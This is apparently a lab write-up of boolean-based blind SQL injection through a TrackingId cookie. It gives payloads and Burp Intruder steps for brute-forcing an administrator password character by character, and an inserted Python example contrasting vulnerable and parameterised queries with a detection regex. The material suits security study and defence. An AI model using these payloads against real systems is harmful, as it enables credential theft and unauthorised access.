Cookie: TrackingId=tJ1ux5PVRUX2vGYM ' and 1=1 --
When the above payload is used, the Welcome back! message is displayed.
Cookie: TrackingId=tJ1ux5PVRUX2vGYM ' and 1=2 --
When the above payload is used, the Welcome back! message is not displayed.
The application responds differently depending on whether the condition we send is true or false. We can use this difference in response to extract the password from the users table. Before that:
Cookie: TrackingId=tJ1ux5PVRUX2vGYM ' and (select 'x' from users ) = 'x' --
This payload checks whether the users table exists. Since the Welcome back! message is displayed, we can confirm that the users table exists.
Cookie: TrackingId=tJ1ux5PVRUX2vGYM ' and (select username from users where username = 'administrator') = 'administrator' --
This payload returns true if the user administrator exists in the users table and false if it does not. Since the administrator user exists, the query returns true and hence the Welcome back! message is displayed.
Now that we know the administrator user exists in the table, we can proceed to finding the length of the password, which makes brute-forcing the password later much easier.
Cookie: TrackingId=tJ1ux5PVRUX2vGYM ' and (select length(password) from users where username = 'administrator')>0 --
In the above query, the (select length(password) from users where username = 'administrator')>0 part returns true since the password length is greater than zero, and hence the Welcome back! message is displayed.
The application will not return the Welcome back! message if the condition is false. For example, if the password length is 8 and the query is (select length(password) from users where username = 'administrator')>10, the condition is false and the Welcome back! message will not be displayed.
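As an added example (not code from this write-up or from the lab), the following Python models the lookup behind the TrackingId cookie against a constructed in-memory SQLite database: the concatenated query leaks one bit per request through the Welcome back! message exactly as described above, the parameterised query does not, and a small heuristic flags the probe shape in a cookie value for log review. The table names, the placeholder password and the regex are assumptions.

```python
import re
import sqlite3

# Constructed stand-in for the lab backend (not the lab's real code): a tracking
# table and a users table with a placeholder administrator password.
def build_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE tracking (id TEXT)")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO tracking VALUES ('tJ1ux5PVRUX2vGYM')")
    conn.execute("INSERT INTO users VALUES ('administrator', 'placeholder-secret')")
    conn.commit()
    return conn

def vulnerable_lookup(conn, tracking_id):
    """Cookie value concatenated into the query. The attacker's quote closes the
    string literal, so the rest of the cookie is parsed as SQL, and the page
    leaks one bit per request through the Welcome back! message."""
    sql = "SELECT id FROM tracking WHERE id = '" + tracking_id + "'"
    return "Welcome back!" if conn.execute(sql).fetchone() else ""

def safe_lookup(conn, tracking_id):
    """Same lookup with a bound parameter: the cookie is always treated as data,
    so an injected condition simply fails to match any tracking id."""
    row = conn.execute("SELECT id FROM tracking WHERE id = ?", (tracking_id,)).fetchone()
    return "Welcome back!" if row else ""

# Heuristic for log review or a WAF rule: a quote followed by AND/OR and a
# comparison operator, the shape of every probe in this write-up. Constructed
# regex; expect to tune it against real traffic.
PROBE_PATTERN = re.compile(r"'\s*(and|or)\b.*[=<>]", re.IGNORECASE)

def looks_like_boolean_probe(cookie_value):
    return PROBE_PATTERN.search(cookie_value) is not None

if __name__ == "__main__":
    db = build_db()
    for cookie in ("tJ1ux5PVRUX2vGYM",
                   "tJ1ux5PVRUX2vGYM' and 1=1 --",
                   "tJ1ux5PVRUX2vGYM' and 1=2 --",
                   "tJ1ux5PVRUX2vGYM' and (select length(password) from users "
                   "where username = 'administrator')>0 --"):
        print(f"{cookie!r}\n  vulnerable: {vulnerable_lookup(db, cookie) or '(no message)'}"
              f"\n  safe:       {safe_lookup(db, cookie) or '(no message)'}"
              f"\n  flagged:    {looks_like_boolean_probe(cookie)}")
```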
It is tiring to change the length digit by hand and watch for the change in the application's response, so we will use the Intruder feature of Burp Suite.
Press Ctrl + I to send the request to Intruder.
Select the 0 (the length value) in the query as the payload position.
Set Attack type to Sniper.
On the Payloads section, set the payload to the numbers to try as the password length.
Here we can see a difference in length. In the response of length 5437 we can see the Welcome back! message.
We can clearly see that the response length for payloads 0–19 is 5473, and those responses contain the Welcome back! message.
But the response length for payloads greater than 20 is 5412, and those responses do not contain the Welcome back! message.
Therefore, the length of the password is 20.
Note: The response lengths may differ in your case. Focus on the response message that goes with each response length.
Now it is time to get the password.
In Intruder, edit the payload as:
Cookie: TrackingId=tJ1ux5PVRUX2vGYM ' and (select substring(password ,1,1) from users where username = 'administrator')= 'a' --
For example, for the string dollarboysushil, substring(password,1,1) gives d.
(select substring(password ,1,1) from users where username = 'administrator') returns the first character of the password. If that character equals 'a', the condition is true and the response contains the Welcome back! message.
In Intruder:
Select the start position of the substring function and the comparison value as payload positions, and click Add.
Select Attack type: Cluster Bomb.
In the Payloads section:
- Payload set 1 (this is the payload for the start position of the substring function)
- Payload type: Numbers
- Payload settings, From: 0
- Payload settings, To: 20 (which is the length of the password)
- Payload settings, Step: 1
Now edit Payload set 2 (this is the payload for the characters we are comparing):
- Payload type: Brute forcer
- Min length: 1
- Max length: 1
Then start the attack.
There are two response lengths; the responses of one length contain the Welcome back! message. In my case, 5473 contains the Welcome back! message. Sort by response length and arrange the matching characters in position order to reassemble the password.
In my case, Password = baw6dlog9hpv7tfxus9l
My social media handles:
Instagram: dollarboysushil
Twitter (X): dollarboysushil
YouTube: dollarboysushil
This write-up was inspired and helped by Rana Khalil. Check her YouTube video here.